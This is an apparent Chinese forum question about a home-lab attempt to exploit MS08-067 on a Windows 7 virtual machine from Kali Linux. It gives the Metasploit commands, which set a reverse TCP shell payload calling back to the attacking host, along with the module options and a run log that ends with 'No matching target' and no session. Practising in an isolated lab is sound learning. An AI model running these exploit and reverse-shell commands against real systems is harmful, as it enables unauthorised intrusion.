在本文中,博主描述了一次使用Kali Linux针对Windows 7靶机尝试利用MS08-067漏洞进行攻击的过程。他们成功建立了反向TCP连接,但最终因找不到匹配的目标而未能建立会话。问题可能在于靶机设置或攻击机的配置。
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
靶机:虚拟机win7 x64 专业版 nat网络 IP:192.168.233.128(新安装)
攻击机:虚拟机Kali Linux nat网络 IP:192.168.233.129
靶机与虚拟机双向ping通,nmap检测靶机445端口开放
命令:
use windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/reverse_tcp
set RHOST 192.168.233.128
set LHOST 192.168.233.129
最后检查配置:
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.233.128 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.233.129 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
确认无误,命令:
run
返回:
[*] Started reverse TCP handler on 192.168.233.129:4444
[*] 192.168.233.128:445 - Automatically detecting the target...
[*] 192.168.233.128:445 - Fingerprint: Windows 7 - - lang:Unknown
[*] 192.168.233.128:445 - We could not detect the language pack, defaulting to English
[-] 192.168.233.128:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.
然后就没有然后了,这是怎么回事?靶机有问题?
扫一扫
7412
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
